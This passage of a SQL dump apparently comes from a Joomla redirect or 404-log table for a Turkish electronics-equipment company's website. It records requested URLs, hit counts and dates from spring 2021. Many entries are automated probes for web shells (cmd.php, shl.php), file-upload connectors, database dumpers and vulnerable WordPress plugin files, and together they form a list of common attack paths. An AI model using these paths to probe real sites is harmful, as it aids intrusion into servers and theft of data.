13:49:23','0000-00-00 00:00:00',301),(27346,'https://3s-technologies.com.tr/tr/apple-touch-icon-precomposed.png',NULL,'','',22,0,'2021-04-04 17:23:16','0000-00-00 00:00:00',301),(27347,'https://3s-technologies.com.tr/tr/apple-touch-icon.png',NULL,'','',23,0,'2021-04-04 17:23:16','0000-00-00 00:00:00',301),(27348,'http://3s-technologies.com.tr/tr/xxxss',NULL,'','',4,0,'2021-04-05 01:10:54','0000-00-00 00:00:00',301),(27349,'http://3s-technologies.com.tr/en/jsys.php',NULL,'','',1,0,'2021-04-05 12:47:53','0000-00-00 00:00:00',301),(27350,'https://3s-technologies.com.tr/tr/.well-known/apple-app-site-association',NULL,'','',83,0,'2021-04-07 01:45:28','0000-00-00 00:00:00',301),(27351,'https://3s-technologies.com.tr/tr/apple-app-site-association',NULL,'','',80,0,'2021-04-07 01:46:15','0000-00-00 00:00:00',301),(27352,'http://www.3s-technologies.com.tr/tr/a9bc224bd710f56d27affffddc764239b58c3faa0/shield.png',NULL,'','',1,0,'2021-04-07 05:49:15','0000-00-00 00:00:00',301),(27353,'http://www.3s-technologies.com.tr/en/a9bc224bd710f56d27affffddc764239b58c3faa0/shield.png',NULL,'http://www.3s-technologies.com.tr/en/81-english-uk/english-content/80-panasonic-am100-kampanya','',1,0,'2021-04-07 06:20:09','0000-00-00 00:00:00',301),(27354,'https://www.3s-technologies.com.tr/en/products-en/manufacturer/ddm-novastar/screen-printer/by,ordering?language=en-gb&keyword',NULL,'','',1,0,'2021-04-07 11:31:47','0000-00-00 00:00:00',301),(27355,'http://3s-technologies.com.tr/en/filemanager/connectors/php/filemanager.php',NULL,'http://3s-technologies.com.tr/filemanager/connectors/php/filemanager.php','',1,0,'2021-04-08 01:15:06','0000-00-00 00:00:00',301),(27356,'http://3s-technologies.com.tr/en/fckeditor/editor/filemanager/upload/php/upload.php',NULL,'http://3s-technologies.com.tr/FCKeditor/editor/filemanager/upload/php/upload.php','',2,0,'2021-04-08 03:09:00','0000-00-00 00:00:00',301),(27357,'http://3s-technologies.com.tr/en/admin/fckeditor/editor/filemanager/upload/php/upload.php',NULL,'http://3s-technologies.com.tr/admin/FCKeditor/editor/filemanager/upload/php/upload.php','',2,0,'2021-04-08 06:53:41','0000-00-00 00:00:00',301),(27358,'http://3s-technologies.com.tr/k.php',NULL,'','',1,0,'2021-04-08 09:02:17','0000-00-00 00:00:00',301),(27359,'https://3s-technologies.com.tr/tr/?option=com_content&view=article&id=88&itemid=100',NULL,'','',75,0,'2021-04-08 09:27:21','0000-00-00 00:00:00',301),(27360,'http://3s-technologies.com.tr/en/editor/editor/filemanager/upload/php/upload.php',NULL,'http://3s-technologies.com.tr/editor/editor/filemanager/upload/php/upload.php','',1,0,'2021-04-08 10:37:10','0000-00-00 00:00:00',301),(27361,'http://3s-technologies.com.tr/en/admin/editor/filemanager/upload/php/upload.php',NULL,'http://3s-technologies.com.tr/admin/editor/filemanager/upload/php/upload.php','',1,0,'2021-04-08 12:30:31','0000-00-00 00:00:00',301),(27362,'https://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/zero-ion-g3-detail',NULL,'','',15,0,'2021-04-08 12:56:12','0000-00-00 00:00:00',301),(27363,'http://3s-technologies.com.tr/en/editor/filemanager/upload/php/upload.php',NULL,'http://3s-technologies.com.tr/editor/filemanager/upload/php/upload.php','',1,0,'2021-04-08 14:20:21','0000-00-00 00:00:00',301),(27364,'https://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim',NULL,'','',9,0,'2021-04-09 02:34:15','0000-00-00 00:00:00',301),(27365,'http://3s-technologies.com.tr/tr/e/data/js/ajax.js',NULL,'','',4,0,'2021-04-09 16:30:03','0000-00-00 00:00:00',301),(27366,'https://3s-technologies.com.tr/en/apple-touch-icon-precomposed.png',NULL,'','',4,0,'2021-04-09 18:48:38','0000-00-00 00:00:00',301),(27367,'https://3s-technologies.com.tr/en/apple-touch-icon.png',NULL,'','',5,0,'2021-04-09 18:48:38','0000-00-00 00:00:00',301),(27368,'http://3s-technologies.com.tr/tr/administrator/components/com_civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2021-04-10 04:59:37','0000-00-00 00:00:00',301),(27369,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/xmlrpc.php',NULL,'','',1,0,'2021-04-10 18:26:21','0000-00-00 00:00:00',301),(27370,'http://3s-technologies.com.tr/tr/rn.php',NULL,'','',2,0,'2021-04-11 16:10:14','0000-00-00 00:00:00',301),(27371,'http://3s-technologies.com.tr/en/rn.php',NULL,'','',1,0,'2021-04-11 16:10:28','0000-00-00 00:00:00',301),(27372,'https://3s-technologies.com.tr/tr/templates/beez5/images/vm-preloader.gif',NULL,'https://3s-technologies.com.tr/templates/beez5/css/vmsite-ltr.css?vmver=6ee028ee','',17,0,'2021-04-12 17:49:02','0000-00-00 00:00:00',301),(27373,'http://3s-technologies.com.tr/en/sxd/sxd.js',NULL,'http://3s-technologies.com.tr/sxd/sxd.js','',3,0,'2021-04-13 04:48:22','0000-00-00 00:00:00',301),(27374,'https://3s-technologies.com.tr/en/welcome.html',NULL,'','',14,0,'2021-04-14 00:34:11','0000-00-00 00:00:00',301),(27375,'https://3s-technologies.com.tr/en/.well-known/apple-app-site-association',NULL,'https://3s-technologies.com.tr/en/','',2,0,'2021-04-14 10:46:01','0000-00-00 00:00:00',301),(27376,'https://3s-technologies.com.tr/en/.well-known/assetlinks.json',NULL,'https://3s-technologies.com.tr/en/','',3,0,'2021-04-14 10:46:01','0000-00-00 00:00:00',301),(27377,'http://3s-technologies.com.tr/tr/components/com_jbusinessdirectory/assets/upload.php',NULL,'http://www.google.com/','',27,0,'2021-04-15 16:45:02','0000-00-00 00:00:00',301),(27378,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/aqueous',NULL,'','',1,0,'2021-04-16 14:43:21','0000-00-00 00:00:00',301),(27379,'http://3s-technologies.com.tr/tr/modules/mod_impact/elements/upload_file.php',NULL,'http://www.google.com/','',5,0,'2021-04-18 06:56:39','0000-00-00 00:00:00',301),(27380,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim',NULL,'','',7,0,'2021-04-21 02:46:12','0000-00-00 00:00:00',301),(27381,'https://www.3s-technologies.com.tr/tr/a9bc224bd710f56d27affffddc764239b58c3faa0/shield.png',NULL,'','',11,0,'2021-04-21 11:21:08','0000-00-00 00:00:00',301),(27382,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux',NULL,'','',9,0,'2021-04-21 15:56:20','0000-00-00 00:00:00',301),(27383,'http://3s-technologies.com.tr/tr/wp-content/uploads/estate_templates/doc.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/estate_templates/doc.php','',3,0,'2021-04-23 07:39:08','0000-00-00 00:00:00',301),(27384,'http://3s-technologies.com.tr/tr/wp-content/plugins/redirection/models/wp-contentt.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/redirection/models/wp-contentt.php','',1,0,'2021-04-23 07:57:31','0000-00-00 00:00:00',301),(27385,'http://3s-technologies.com.tr/tr/wp-content/wp-muen.php',NULL,'http://3s-technologies.com.tr/wp-content/wp-muen.php','',1,0,'2021-04-23 08:18:49','0000-00-00 00:00:00',301),(27386,'http://3s-technologies.com.tr/tr/wp-admin.php',NULL,'http://3s-technologies.com.tr/wp-admin.php','',187,0,'2021-04-23 09:45:03','0000-00-00 00:00:00',301),(27387,'http://3s-technologies.com.tr/tr/class-widget-archives.php',NULL,'http://3s-technologies.com.tr/class-widget-archives.php','',5,0,'2021-04-23 21:56:39','0000-00-00 00:00:00',301),(27388,'http://3s-technologies.com.tr/tr/sitemap.php',NULL,'http://3s-technologies.com.tr/sitemap.php','',6,0,'2021-04-24 17:35:39','0000-00-00 00:00:00',301),(27389,'https://3s-technologies.com.tr/en/g;m.parentnode.insertbefore',NULL,'HTTPS://3s-technologies.com.tr/','',3,0,'2021-04-24 22:33:21','0000-00-00 00:00:00',301),(27390,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar',NULL,'','',3,0,'2021-04-27 02:25:03','0000-00-00 00:00:00',301),(27391,'http://3s-technologies.com.tr/en/sypexdumper/sxd/sxd.js',NULL,'http://3s-technologies.com.tr/SypexDumper/sxd/sxd.js','',1,0,'2021-04-27 11:52:29','0000-00-00 00:00:00',301),(27392,'http://3s-technologies.com.tr/en/dumper/sxd.js',NULL,'http://3s-technologies.com.tr/dumper/sxd.js','',1,0,'2021-04-27 11:52:30','0000-00-00 00:00:00',301),(27393,'http://3s-technologies.com.tr/en/admin/dumper/sxd.js',NULL,'http://3s-technologies.com.tr/admin/dumper/sxd.js','',1,0,'2021-04-27 11:52:30','0000-00-00 00:00:00',301),(27394,'http://3s-technologies.com.tr/en/admin/sxd/sxd.js',NULL,'http://3s-technologies.com.tr/admin/sxd/sxd.js','',1,0,'2021-04-27 11:52:31','0000-00-00 00:00:00',301),(27395,'http://3s-technologies.com.tr/en/backup/sxd/sxd.js',NULL,'http://3s-technologies.com.tr/backup/sxd/sxd.js','',1,0,'2021-04-27 11:52:33','0000-00-00 00:00:00',301),(27396,'http://3s-technologies.com.tr/en/dump/sxd.js',NULL,'http://3s-technologies.com.tr/dump/sxd.js','',1,0,'2021-04-27 11:52:34','0000-00-00 00:00:00',301),(27397,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/en/products-en/laser-marking-machine/lps-c-detail&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:19','0000-00-00 00:00:00',301),(27398,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/en/products-en/odd-shape-inserter/npm-vf-detail&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:20','0000-00-00 00:00:00',301),(27399,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/en/products-en/screen-printer/spg-detail&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:20','0000-00-00 00:00:00',301),(27400,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/en/products-en/smd-orta-hızlı/am100-detail&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:20','0000-00-00 00:00:00',301),(27401,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/en/products-en/smd-ultra-hız/npm-d3a-1-detail&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:20','0000-00-00 00:00:00',301),(27402,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/en/products-en/smd-ultra-hız/npm-detail&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:21','0000-00-00 00:00:00',301),(27403,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/en/products-en/smd-ultra-hız/npm-w2s-detail&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:21','0000-00-00 00:00:00',301),(27404,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/en/products-en/thru-hole/av132-detail&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:21','0000-00-00 00:00:00',301),(27405,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/en/products-en/thru-hole/rg131-detail&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:21','0000-00-00 00:00:00',301),(27406,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/en/products-en/thru-hole/rl132-detail&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:21','0000-00-00 00:00:00',301),(27407,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/brochures/panacim_en_20_0101.pdf&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:22','0000-00-00 00:00:00',301),(27408,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/brochures/spv_en_20_0101_0.pdf&quot;&gt;&lt;img',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:22','0000-00-00 00:00:00',301),(27409,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/cnc/1500x1500/center-comp-1-640x377.png&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:22','0000-00-00 00:00:00',301),(27410,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/ddm/le40v.png&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:22','0000-00-00 00:00:00',301),(27411,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/am100.jpg&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:22','0000-00-00 00:00:00',301),(27412,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/lps-c-front.png&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:23','0000-00-00 00:00:00',301),(27413,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/npm-d3-front.png&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:23','0000-00-00 00:00:00',301),(27414,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/npm-vf-1.png&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:23','0000-00-00 00:00:00',301),(27415,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/npm-w2-w2s-front.png&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:23','0000-00-00 00:00:00',301),(27416,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/npm-w2.png&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:24','0000-00-00 00:00:00',301),(27417,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/rl132.jpg&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:24','0000-00-00 00:00:00',301),(27418,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/spg-front.png&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:24','0000-00-00 00:00:00',301),(27419,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/spv.png&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:24','0000-00-00 00:00:00',301),(27420,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/av132.jpg&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:24','0000-00-00 00:00:00',301),(27421,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/panacim-logo.jpg&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:25','0000-00-00 00:00:00',301),(27422,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/panacim-overview.gif&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:25','0000-00-00 00:00:00',301),(27423,'https://3s-technologies.com.tr/en/&quot;https://3s-technologies.com.tr/images/panasonic/rg131.png&quot;',NULL,'HTTPS://3s-technologies.com.tr/','',1,0,'2021-04-27 16:27:25','0000-00-00 00:00:00',301),(27424,'http://3s-technologies.com.tr/tr/old-index.php',NULL,'','',40,0,'2021-04-27 18:55:06','0000-00-00 00:00:00',301),(27425,'https://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/spartan-8s-8d-detail',NULL,'','',7,0,'2021-04-29 09:38:03','0000-00-00 00:00:00',301),(27426,'https://3s-technologies.com.tr/index.php/tr/hakk-m-zda',NULL,'','',22,0,'2021-04-29 23:28:12','0000-00-00 00:00:00',301),(27427,'https://3s-technologies.com.tr/index.php/tr/ueruenler/konveyorler',NULL,'','',2,0,'2021-04-30 23:18:38','0000-00-00 00:00:00',301),(27428,'https://3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer',NULL,'','',5,0,'2021-05-01 04:01:09','0000-00-00 00:00:00',301),(27429,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/kester',NULL,'','',6,0,'2021-05-01 14:37:28','0000-00-00 00:00:00',301),(27430,'https://3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr/turkish-content',NULL,'','',23,0,'2021-05-01 23:12:58','0000-00-00 00:00:00',301),(27431,'https://3s-technologies.com.tr/tr/00-center-comp-1-640x377.png',NULL,'','',2,0,'2021-05-12 20:36:39','0000-00-00 00:00:00',301),(27432,'https://3s-technologies.com.tr/tr/80-sp18_av3.jpg',NULL,'','',3,0,'2021-05-13 04:04:24','0000-00-00 00:00:00',301),(27433,'https://3s-technologies.com.tr/tr/apple-touch-icon-120x120-precomposed.png',NULL,'','',3,0,'2021-05-13 11:07:46','0000-00-00 00:00:00',301),(27434,'https://3s-technologies.com.tr/tr/apple-touch-icon-120x120.png',NULL,'','',3,0,'2021-05-13 11:07:46','0000-00-00 00:00:00',301),(27435,'http://www.3s-technologies.com.tr/tr/80-turkish-tr/turkish-content/80-sp18_av3.jpg',NULL,'','',2,0,'2021-05-13 18:12:53','0000-00-00 00:00:00',301),(27436,'http://3s-technologies.com.tr/tr/00-center-comp-1-640x377.png',NULL,'','',5,0,'2021-05-13 19:32:38','0000-00-00 00:00:00',301),(27437,'http://3s-technologies.com.tr/fckeditor/editor/filemanager/connectors/asp/connector.asp?command=fileupload&type=file&currentfolder=/',NULL,'http://3s-technologies.com.tr/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=FileUpload&Type=File&CurrentFolder=%2F','',5,0,'2021-05-14 02:58:19','0000-00-00 00:00:00',301),(27438,'http://3s-technologies.com.tr/tr/80-sp18_av3.jpg',NULL,'','',2,0,'2021-05-14 07:30:03','0000-00-00 00:00:00',301),(27439,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products-en',NULL,'','',1,0,'2021-05-15 20:32:46','0000-00-00 00:00:00',301),(27440,'http://3s-technologies.com.tr/tr/wp-content/admin.php',NULL,'http://3s-technologies.com.tr/wp-content/admin.php','',389,0,'2021-05-17 16:40:51','0000-00-00 00:00:00',301),(27441,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/content-post.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/background-image-cropper/content-post.php','',1,0,'2021-05-17 18:01:18','0000-00-00 00:00:00',301),(27442,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/11/doc.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/2020/11/doc.php','',2,0,'2021-05-17 20:49:55','0000-00-00 00:00:00',301),(27443,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyseventeen/404.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentyseventeen/404.php','',2,0,'2021-05-17 21:11:25','0000-00-00 00:00:00',301),(27444,'http://3s-technologies.com.tr/tr/wp-content/uploads/2020/04/content-post.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/2020/04/content-post.php','',1,0,'2021-05-17 23:41:07','0000-00-00 00:00:00',301),(27445,'http://3s-technologies.com.tr/tr/admin/controller/extension/module/opheadar.php',NULL,'http://3s-technologies.com.tr/admin/controller/extension/module/opheadar.php','',2,0,'2021-05-17 23:52:01','0000-00-00 00:00:00',301),(27446,'http://3s-technologies.com.tr/tr/wp-includes/dcomay.php',NULL,'http://3s-technologies.com.tr/wp-includes/dcomay.php','',1,0,'2021-05-18 01:57:10','0000-00-00 00:00:00',301),(27447,'https://3s-technologies.com.tr/tr/?itemid=243',NULL,'','',57,0,'2021-05-18 02:51:15','0000-00-00 00:00:00',301),(27448,'http://3s-technologies.com.tr/tr/wp-content/themes/alternate-lite/inc/niko.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/alternate-lite/inc/niko.php','',4,0,'2021-05-18 06:18:31','0000-00-00 00:00:00',301),(27449,'http://3s-technologies.com.tr/tr/wp-content/themes/alternate-lite/inc/network.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/alternate-lite/inc/network.php','',1,0,'2021-05-18 06:51:29','0000-00-00 00:00:00',301),(27450,'http://3s-technologies.com.tr/tr/wp-content/themes/dulcet/footer1.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/dulcet/footer1.php','',1,0,'2021-05-18 07:40:19','0000-00-00 00:00:00',301),(27451,'http://3s-technologies.com.tr/tr/errors/404.php',NULL,'http://3s-technologies.com.tr/errors/404.php','',2,0,'2021-05-18 07:52:57','0000-00-00 00:00:00',301),(27452,'http://3s-technologies.com.tr/tr/wp-includes/wp-info.php',NULL,'http://3s-technologies.com.tr/wp-includes/wp-info.php','',1,0,'2021-05-18 08:36:10','0000-00-00 00:00:00',301),(27453,'http://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-filesystem-import.php',NULL,'http://3s-technologies.com.tr/wp-admin/includes/class-wp-filesystem-import.php','',2,0,'2021-05-18 11:49:46','0000-00-00 00:00:00',301),(27454,'http://3s-technologies.com.tr/tr/wp-content/plugins/404.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/404.php','',1,0,'2021-05-18 12:04:50','0000-00-00 00:00:00',301),(27455,'http://3s-technologies.com.tr/tr/wp-content/themes/cp20/jss.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/CP20/jss.php','',1,0,'2021-05-18 12:08:32','0000-00-00 00:00:00',301),(27456,'http://3s-technologies.com.tr/tr/im.php',NULL,'http://3s-technologies.com.tr/im.php','',4,0,'2021-05-18 12:20:49','0000-00-00 00:00:00',301),(27457,'http://3s-technologies.com.tr/tr/wp-plugins.php.suspected',NULL,'http://3s-technologies.com.tr/wp-plugins.php.suspected','',3,0,'2021-05-18 12:55:59','0000-00-00 00:00:00',301),(27458,'http://3s-technologies.com.tr/tr/wp-content/plugins/akismet/views/connect-jp.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/akismet/views/connect-jp.php','',1,0,'2021-05-18 13:31:30','0000-00-00 00:00:00',301),(27459,'http://3s-technologies.com.tr/tr/wp-content/plugins/hello.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/hello.php','',24,0,'2021-05-18 13:31:53','0000-00-00 00:00:00',301),(27460,'http://3s-technologies.com.tr/tr/wp-content/plugins/coloros/weblinks.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/coloros/weblinks.php','',1,0,'2021-05-18 14:47:16','0000-00-00 00:00:00',301),(27461,'http://3s-technologies.com.tr/tr/wp-content/plugins/google-sitemap-generator/img/funjr.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/google-sitemap-generator/img/funjr.php','',3,0,'2021-05-18 15:19:20','0000-00-00 00:00:00',301),(27462,'http://3s-technologies.com.tr/tr/wp-content/plugins/akismet/views/activate.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/akismet/views/activate.php','',1,0,'2021-05-19 08:26:11','0000-00-00 00:00:00',301),(27463,'http://3s-technologies.com.tr/tr/wp-admin/link.php',NULL,'http://3s-technologies.com.tr/wp-admin/link.php','',1,0,'2021-05-19 09:12:34','0000-00-00 00:00:00',301),(27464,'http://3s-technologies.com.tr/tr/wp-content/plugins/akismet/class.akismet-widget.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/akismet/class.akismet-widget.php','',1,0,'2021-05-19 09:13:29','0000-00-00 00:00:00',301),(27465,'http://3s-technologies.com.tr/tr/wp-content/themes/greensblog/template-parts/simple.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/greensblog/template-parts/simple.php','',1,0,'2021-05-19 09:30:08','0000-00-00 00:00:00',301),(27466,'http://3s-technologies.com.tr/tr/class-wp-archives.php',NULL,'http://3s-technologies.com.tr/class-wp-archives.php','',2,0,'2021-05-19 09:59:37','0000-00-00 00:00:00',301),(27467,'http://3s-technologies.com.tr/tr/wp-admin/options-permalink.php',NULL,'http://3s-technologies.com.tr/wp-admin/options-permalink.php','',1,0,'2021-05-19 10:01:27','0000-00-00 00:00:00',301),(27468,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/images.php',NULL,'http://3s-technologies.com.tr/wp-includes/theme-compat/images.php','',1,0,'2021-05-19 10:34:46','0000-00-00 00:00:00',301),(27469,'http://3s-technologies.com.tr/tr/wp-admin/ms-users.php',NULL,'http://3s-technologies.com.tr/wp-admin/ms-users.php','',1,0,'2021-05-19 12:10:13','0000-00-00 00:00:00',301),(27470,'http://3s-technologies.com.tr/tr/cmd.php',NULL,'http://3s-technologies.com.tr/cmd.php','',12,0,'2021-05-19 13:10:34','0000-00-00 00:00:00',301),(27471,'http://3s-technologies.com.tr/tr/wp-admin/update-core.php',NULL,'http://3s-technologies.com.tr/wp-admin/update-core.php','',1,0,'2021-05-19 13:23:54','0000-00-00 00:00:00',301),(27472,'http://3s-technologies.com.tr/tr/wp-content/plugins/unicode/w.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/unicode/w.php','',1,0,'2021-05-19 13:30:17','0000-00-00 00:00:00',301),(27473,'http://3s-technologies.com.tr/tr/wp-content/plugins/easyrotator-for-wordpress/wj.php.suspected',NULL,'http://3s-technologies.com.tr/wp-content/plugins/easyrotator-for-wordpress/wj.php.suspected','',1,0,'2021-05-19 13:51:06','0000-00-00 00:00:00',301),(27474,'http://3s-technologies.com.tr/tr/wp-includes/indeh.php',NULL,'http://3s-technologies.com.tr/wp-includes/indeh.php','',1,0,'2021-05-19 14:18:11','0000-00-00 00:00:00',301),(27475,'http://3s-technologies.com.tr/tr/includes/as.php',NULL,'http://3s-technologies.com.tr/includes/as.php','',4,0,'2021-05-19 14:54:52','0000-00-00 00:00:00',301),(27476,'http://3s-technologies.com.tr/tr/wp-content/plugins/akismet/class.akismet-admin.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/akismet/class.akismet-admin.php','',2,0,'2021-05-19 16:21:07','0000-00-00 00:00:00',301),(27477,'http://3s-technologies.com.tr/tr/wp-admin/install-helper.php',NULL,'http://3s-technologies.com.tr/wp-admin/install-helper.php','',1,0,'2021-05-19 16:36:52','0000-00-00 00:00:00',301),(27478,'http://3s-technologies.com.tr/tr/wp-content/plugins/background-image-cropper/content-post.php.suspected',NULL,'http://3s-technologies.com.tr/wp-content/plugins/background-image-cropper/content-post.php.suspected','',1,0,'2021-05-19 16:52:35','0000-00-00 00:00:00',301),(27479,'http://3s-technologies.com.tr/tr/wp-admin/admin.php',NULL,'http://3s-technologies.com.tr/wp-admin/admin.php','',130,0,'2021-05-19 17:08:09','0000-00-00 00:00:00',301),(27480,'https://3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name/results,1-10?language=tr-tr&filter_product=',NULL,'','',2,0,'2021-05-20 00:52:16','0000-00-00 00:00:00',301),(27481,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer?language=en-gb',NULL,'','',12,0,'2021-05-20 01:46:13','0000-00-00 00:00:00',301),(27482,'http://3s-technologies.com.tr/tr/wp-admin/user/profile.php',NULL,'http://3s-technologies.com.tr/wp-admin/user/profile.php','',1,0,'2021-05-20 05:01:36','0000-00-00 00:00:00',301),(27483,'http://3s-technologies.com.tr/en/shl.php',NULL,'http://3s-technologies.com.tr/shl.php','',14,0,'2021-05-20 11:13:27','0000-00-00 00:00:00',301),(27484,'http://3s-technologies.com.tr/en/admin/dumper.php',NULL,'http://3s-technologies.com.tr/admin/dumper.php','',1,0,'2021-05-20 11:13:27','0000-00-00 00:00:00',301),(27485,'http://3s-technologies.com.tr/en/backup/dumper.php',NULL,'http://3s-technologies.com.tr/backup/dumper.php','',3,0,'2021-05-20 11:13:28','0000-00-00 00:00:00',301),(27486,'http://3s-technologies.com.tr/en/db/dumper.php',NULL,'http://3s-technologies.com.tr/db/dumper.php','',1,0,'2021-05-20 11:13:29','0000-00-00 00:00:00',301),(27487,'http://3s-technologies.com.tr/en/dump/dumper.php',NULL,'http://3s-technologies.com.tr/dump/dumper.php','',1,0,'2021-05-20 11:13:29','0000-00-00 00:00:00',301),(27488,'http://3s-technologies.com.tr/en/dumper.php',NULL,'http://3s-technologies.com.tr/dumper.php','',1,0,'2021-05-20 11:13:30','0000-00-00 00:00:00',301),(27489,'http://3s-technologies.com.tr/en/dumper/dumper.php',NULL,'http://3s-technologies.com.tr/dumper/dumper.php','',1,0,'2021-05-20 11:13:31','0000-00-00 00:00:00',301),(27490,'http://3s-technologies.com.tr/en/sxd/index.php',NULL,'http://3s-technologies.com.tr/sxd/index.php','',1,0,'2021-05-20 11:13:31','0000-00-00 00:00:00',301),(27491,'http://3s-technologies.com.tr/en/sypex/dumper.php',NULL,'http://3s-technologies.com.tr/sypex/dumper.php','',1,0,'2021-05-20 11:13:32','0000-00-00 00:00:00',301),(27492,'https://3s-technologies.com.tr/tr/adminer.php',NULL,'https://3s-technologies.com.tr/adminer.php','',8,0,'2021-05-21 17:06:27','0000-00-00 00:00:00',301),(27493,'http://3s-technologies.com.tr/en/wp-admin',NULL,'','',164,0,'2021-05-23 